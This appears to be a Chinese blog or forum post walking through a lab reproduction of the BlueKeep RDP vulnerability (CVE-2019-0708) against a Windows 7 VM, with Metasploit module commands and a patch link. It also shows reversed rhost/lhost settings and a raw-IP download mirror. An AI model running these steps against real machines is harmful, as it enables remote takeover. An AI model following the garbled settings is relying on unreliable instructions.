CVE2019-0708提权复现【未通过】

先来简单的看下什么是0708

它的全称是CVE 2019-0708 是于2019年5月15日被爆出的远程命令执行漏洞 一旦成功的利用便掌握目标系统的权限,危害不亚于永恒之蓝。

本次相关工具的下载地址

kali Linux 2020 虚拟机镜像:

https://images.offensive-security.com/virtual-images/kali-linux-2020.2-vmware-amd64.7z

Windows 7 原版镜像(用迅雷下载 ):

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

奇安信检测工具

现在开始进行复现

攻击机:KALI 2020

靶机:Windows7旗舰版

首先第一步要开下win7的3389(远程桌面端口)方法看下图

开启之后来进行检测和利用漏洞

检测方法:

用奇安信的0708漏洞检测工具来进行检测(这是最为简单的方法)

在命令行下打开检测工具输入IP和3389即可进行检测

例如下图

image

回到kali下打开终端

输入以下命令

Msfconsole

/进入到msf工具/

Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ueKeep RDP Remote Windows Kernel Use After Free

/使用攻击模块/

Set rhost 本机ip

Set lhosts 靶机ip

Set rport 3389

/设置ip和端口信息/

最后输入 show targets来查看负载信息 根据靶机的类型选 我的是运行在vm 15.1下的我就选择了5

确定自己的负载后 用set target 数字

来选择 最后输入exploit即可完成提权

漏洞如何修复?

直接下载修复补丁 链接如下

或者是用360漏洞检测修复工具来检测修复

http://39.137.85.136:6510/dl.360safe.com/leakfixer/360SysVulTerminator.exehttp://39.137.85.136:6510/dl.360safe.com/leakfixer/360SysVulTerminator.exe

本次复现就结束了

如果遇到利用后发生蓝屏等情况 请换个负载尝试即可

若感兴趣请搭建虚拟机测试,切勿对真实机器进行尝试因为这是违法的。

  • 通过
  • 未通过

0 投票者